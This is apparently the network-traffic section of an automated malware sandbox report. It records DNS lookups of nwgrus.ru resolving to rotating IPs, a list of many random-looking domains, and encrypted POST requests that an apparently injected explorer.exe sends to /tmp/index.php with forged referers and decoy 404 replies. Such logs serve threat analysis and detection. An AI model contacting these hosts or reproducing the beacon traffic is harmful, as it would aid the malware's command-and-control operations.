Oct 13, 2024 18:31:03.440665007 CEST	65289	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:31:03.440818071 CEST	65289	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:31:03.440851927 CEST	65289	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:31:03.445816040 CEST	80	65289	190.156.239.49	192.168.2.4
Oct 13, 2024 18:31:03.445915937 CEST	80	65289	190.156.239.49	192.168.2.4
Oct 13, 2024 18:31:04.500907898 CEST	80	65289	190.156.239.49	192.168.2.4
Oct 13, 2024 18:31:04.509406090 CEST	80	65289	190.156.239.49	192.168.2.4
Oct 13, 2024 18:31:04.509515047 CEST	65289	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:31:04.509599924 CEST	65289	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:31:04.514774084 CEST	80	65289	190.156.239.49	192.168.2.4
Oct 13, 2024 18:31:09.030992985 CEST	65290	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:31:09.036115885 CEST	80	65290	190.156.239.49	192.168.2.4
Oct 13, 2024 18:31:09.036257982 CEST	65290	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:31:09.036417961 CEST	65290	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:31:09.036448956 CEST	65290	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:31:09.041256905 CEST	80	65290	190.156.239.49	192.168.2.4
Oct 13, 2024 18:31:09.041536093 CEST	80	65290	190.156.239.49	192.168.2.4
Oct 13, 2024 18:31:10.096421957 CEST	80	65290	190.156.239.49	192.168.2.4
Oct 13, 2024 18:31:10.096517086 CEST	80	65290	190.156.239.49	192.168.2.4
Oct 13, 2024 18:31:10.096613884 CEST	65290	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:31:10.096738100 CEST	65290	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:31:10.101636887 CEST	80	65290	190.156.239.49	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 18:27:28.655493021 CEST	53	64862	1.1.1.1	192.168.2.4
Oct 13, 2024 18:27:41.999279022 CEST	61734	53	192.168.2.4	1.1.1.1
Oct 13, 2024 18:27:43.007685900 CEST	61734	53	192.168.2.4	1.1.1.1
Oct 13, 2024 18:27:44.048820972 CEST	61734	53	192.168.2.4	1.1.1.1
Oct 13, 2024 18:27:44.320143938 CEST	53	61734	1.1.1.1	192.168.2.4
Oct 13, 2024 18:27:44.320195913 CEST	53	61734	1.1.1.1	192.168.2.4
Oct 13, 2024 18:27:44.320225954 CEST	53	61734	1.1.1.1	192.168.2.4
Oct 13, 2024 18:30:17.703927040 CEST	63384	53	192.168.2.4	1.1.1.1
Oct 13, 2024 18:30:18.713279009 CEST	63384	53	192.168.2.4	1.1.1.1
Oct 13, 2024 18:30:19.713051081 CEST	63384	53	192.168.2.4	1.1.1.1
Oct 13, 2024 18:30:20.008795977 CEST	53	63384	1.1.1.1	192.168.2.4
Oct 13, 2024 18:30:20.008842945 CEST	53	63384	1.1.1.1	192.168.2.4
Oct 13, 2024 18:30:20.008871078 CEST	53	63384	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 13, 2024 18:27:41.999279022 CEST	192.168.2.4	1.1.1.1	0x43c9	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:43.007685900 CEST	192.168.2.4	1.1.1.1	0x43c9	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.048820972 CEST	192.168.2.4	1.1.1.1	0x43c9	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:17.703927040 CEST	192.168.2.4	1.1.1.1	0x3f9	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:18.713279009 CEST	192.168.2.4	1.1.1.1	0x3f9	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:19.713051081 CEST	192.168.2.4	1.1.1.1	0x3f9	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 13, 2024 18:27:44.320143938 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	148.230.249.9	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320143938 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	185.12.79.25	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320143938 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	189.61.54.32	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320143938 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320143938 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320143938 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	190.219.117.240	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320143938 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	190.156.239.49	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320143938 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	211.181.24.133	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320143938 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	175.119.10.231	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320143938 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	109.175.29.39	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320195913 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	148.230.249.9	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320195913 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	185.12.79.25	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320195913 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	189.61.54.32	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320195913 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320195913 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320195913 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	190.219.117.240	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320195913 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	190.156.239.49	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320195913 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	211.181.24.133	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320195913 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	175.119.10.231	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320195913 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	109.175.29.39	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320225954 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	148.230.249.9	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320225954 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	185.12.79.25	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320225954 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	189.61.54.32	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320225954 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320225954 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320225954 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	190.219.117.240	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320225954 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	190.156.239.49	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320225954 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	211.181.24.133	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320225954 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	175.119.10.231	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:27:44.320225954 CEST	1.1.1.1	192.168.2.4	0x43c9	No error (0)	nwgrus.ru	109.175.29.39	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008795977 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	190.156.239.49	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008795977 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	130.204.29.121	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008795977 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	187.204.42.174	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008795977 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	2.185.214.11	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008795977 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	154.144.253.197	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008795977 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008795977 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	211.171.233.126	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008795977 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	190.187.52.42	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008795977 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	116.58.10.60	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008795977 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	190.249.249.14	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008842945 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	190.156.239.49	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008842945 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	130.204.29.121	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008842945 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	187.204.42.174	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008842945 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	2.185.214.11	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008842945 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	154.144.253.197	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008842945 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008842945 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	211.171.233.126	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008842945 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	190.187.52.42	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008842945 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	116.58.10.60	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008842945 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	190.249.249.14	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008871078 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	190.156.239.49	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008871078 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	130.204.29.121	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008871078 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	187.204.42.174	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008871078 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	2.185.214.11	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008871078 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	154.144.253.197	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008871078 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008871078 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	211.171.233.126	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008871078 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	190.187.52.42	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008871078 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	116.58.10.60	A (IP address)	IN (0x0001)	false
Oct 13, 2024 18:30:20.008871078 CEST	1.1.1.1	192.168.2.4	0x3f9	No error (0)	nwgrus.ru	190.249.249.14	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

oiwjgaljhmhwar.com

nwgrus.ru

upppthvngavhg.org

xbxjiiplcauibu.com

uowfkuajgbrsxf.com

bsujqjcrhguj.com

akxpcpdhnwlcvewi.net

yvuudhqxndfwr.net

fgueognrgcdryprb.net

hvywquxnrrbp.org

cacpihwweubtsxg.net

rqcdsrhbxdj.org

llagbnlopmmumxog.net

kdhqngbaswv.org

ttjnxnssovi.org

mxvsopepyhexw.net

icsnyxejpjswt.net

ofymhpccvbs.net

bysfflokkqfepm.org

jktwhgejoiledxll.net

dixscrvatda.net

mjtbwlnoxuan.org

sndnvyniffwfhh.net

vedtfnbjotxnqis.net

ijwwxiabyxki.org

wqfylsyerupgn.com

oqlpckrtfgisr.org

vybahkmcxnemgwbs.net

mmuqkomgbgwmrgx.net

lpffbcdshmrgy.net

espuvwcpdtgkhr.net

qjhgyfigxhdukho.net

qbdfqckmklgu.net

rccfvowoiuloot.net

oxmwgvysvdebn.com

liapcosrblojgddt.com

kargncdaxawnud.com

fmwnhyofuij.net

rihjcvuphiddchm.com

oqytxooojaw.net

vgkkdltoovhgj.org

judwwmqxinxkj.org

tcjadfthgiofpvtt.org

phfffsllnpice.net

ripegxsqlidtbjlk.com

siolcmqbegyqsn.org

xwvgudwewoih.net

cpcybixettuxhrkt.net

gixrpkowgjh.org

voqchluhblp.org

wxvosrmogsfitpw.net

pxipmfrupftaxri.net

piulubiplhrouqkj.net

ynnjyahqefoad.com

gtsvsrpyerihmcqc.org

qkfisicqugofkqpv.net

abelcascgtcbciky.net

pcjiyoflornot.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	64968	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:27:44.338875055 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oiwjgaljhmhwar.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 222 Host: nwgrus.ru
Oct 13, 2024 18:27:44.338875055 CEST	222	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 28 46 bd 89 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vu(F^~Mm>A<>lgY;qg84/ecON@c-9~'OUtR{zianPo^aX5
Oct 13, 2024 18:27:45.302810907 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:27:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 87 e9 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	64969	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:27:45.331068039 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://upppthvngavhg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 123 Host: nwgrus.ru
Oct 13, 2024 18:27:45.331068039 CEST	123	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 27 53 a5 eb Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu'SO9VpA>#-}4?L?
Oct 13, 2024 18:27:46.963160038 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:27:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Oct 13, 2024 18:27:46.963268042 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:27:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Oct 13, 2024 18:27:46.967463017 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:27:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	64970	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:27:46.976579905 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xbxjiiplcauibu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 126 Host: nwgrus.ru
Oct 13, 2024 18:27:46.976579905 CEST	126	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 23 36 e9 ec Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu#6okY'D7_VL)a
Oct 13, 2024 18:27:47.918625116 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:27:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	64971	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:27:47.928205967 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uowfkuajgbrsxf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 306 Host: nwgrus.ru
Oct 13, 2024 18:27:47.929371119 CEST	306	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 53 46 aa fc Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuSF[VoCQdCt^MU.5V"]1[Tv.};C-,M9gEOyeal&\:gX8gfuH~!\|6x+C
